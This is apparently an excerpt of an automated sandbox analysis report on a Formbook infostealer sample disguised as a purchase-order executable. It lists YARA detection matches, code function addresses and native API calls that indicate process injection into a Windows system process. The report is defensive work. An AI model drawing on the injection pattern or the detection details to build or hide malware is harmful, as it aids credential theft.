          Source: 0000000D.00000002.542399139.00000000030A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.542399139.00000000030A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.294755714.00000000039A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.294755714.00000000039A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.348134923.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.348134923.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000000.291860367.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000000.291860367.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: PO_101&102.exe
          Source: PO_101&102.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 9.0.PO_101&102.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.PO_101&102.exe.400000.6.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.PO_101&102.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.PO_101&102.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.2.PO_101&102.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.2.PO_101&102.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.PO_101&102.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.PO_101&102.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.2.PO_101&102.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.2.PO_101&102.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.PO_101&102.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.PO_101&102.exe.400000.8.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.PO_101&102.exe.3a4c4e0.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.PO_101&102.exe.3a4c4e0.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 9.0.PO_101&102.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 9.0.PO_101&102.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.348466397.0000000000FB0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.348466397.0000000000FB0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.333516525.000000000F6F6000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000000.333516525.000000000F6F6000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.348384221.0000000000D70000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.348384221.0000000000D70000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000000.320955277.000000000F6F6000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000000.320955277.000000000F6F6000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.542137974.0000000003070000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.542137974.0000000003070000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.539322069.00000000008D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.539322069.00000000008D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000000.291465505.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000000.291465505.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000D.00000002.542399139.00000000030A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000D.00000002.542399139.00000000030A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.294755714.00000000039A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.294755714.00000000039A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.348134923.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.348134923.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000000.291860367.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000000.291860367.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_00540E25
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_02749968
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_070367B0
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_07037EF0
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_07037360
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_07031982
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_07039830
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_070388B8
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_0703A728
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_0703BDF0
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_07037301
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_0703BB90
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_07032B98
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_0703B2F8
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_0703B988
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_073114A8
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_07314380
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_07311010
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_073140C0
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_07311F99
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_073106B5
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_073106B8
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_07310D0D
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_07313DE1
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_07312C08
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_07314371
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_07311379
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_07312BF7
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_07313227
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_07315931
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_07311000
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_07310007
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_07310040
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_088B06F0
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_088B0E68
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_088B5FB8
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_088B65D9
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_088B79F9
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_088B5FA8
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_088B6327
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_088B6338
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_088BF760
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_088B65E8
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_00401030
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0041E83A
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0041DD3A
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0041EDC6
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0041E5DB
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_00402D87
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_00402D90
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0041D5A6
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_00409E60
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_00402FB0
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_00650E25
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0107F900
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01094120
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010999BF
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01131002
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0114E824
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109A830
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0108B090
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010A20A0
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_011420A8
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_011428EC
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109A309
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01142B28
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109AB40
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0111CB4F
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010A138B
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109EB9A
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010AEBB0
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0113DBD2
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_011303DA
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010AABD8
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_011223E3
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0112FA2B
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109B236
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_011422AE
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01134AEF
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01142D07
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01070D20
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01141D55
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010A2581
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01132D82
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_011425DD
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0108D5E0
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0108841F
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0113D466
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109B477
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01134496
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0114DFCE
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01141FF1
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0113D616
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01095600
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01096E30
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01121EB6
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01142EF7
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_032B2B28
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_0320A309
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_0320AB40
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_0321EBB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_032A03DA
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_032ADBD2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_0321ABD8
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_0329FA2B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_032B22AE
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_03204120
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_031EF900
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_032099BF
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_032BE824
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_0320A830
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_032A1002
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_032120A0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_032B20A8
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_031FB090
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_032B28EC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_032B1FF1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_032BDFCE
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_03206E30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_032AD616
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_032B2EF7
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_032B2D07
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_031E0D20
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_032B1D55
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_03212581
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_032B25DD
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_031FD5E0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_031F841F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_032AD466
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_008EE83A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_008D2D87
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_008D2D90
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_008ED5A6
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_008EE5DB
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_008D9E60
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_008D2FB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 031EB150 appears 87 times
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: String function: 0107B150 appears 145 times
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0041A360 NtCreateFile,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0041A410 NtReadFile,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0041A490 NtClose,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0041A540 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0041A40D NtReadFile,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0041A48B NtClose,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0041A53C NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010B9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010B99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010B9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010B9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010B98F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010B9A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010B9A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010B9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010B9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010B95D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010B9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010B9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010B97A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010B9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010B96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010B9950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010B99D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010B9820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010BB040 NtSuspendThread,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010B98A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010B9B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010BA3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010B9A10 NtQuerySection,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010B9A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010B9520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010BAD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010B9560 NtWriteFile,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010B95F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010BA710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010B9730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010B9760 NtOpenProcess,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010BA770 NtOpenThread,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010B9770 NtSetInformationFile,
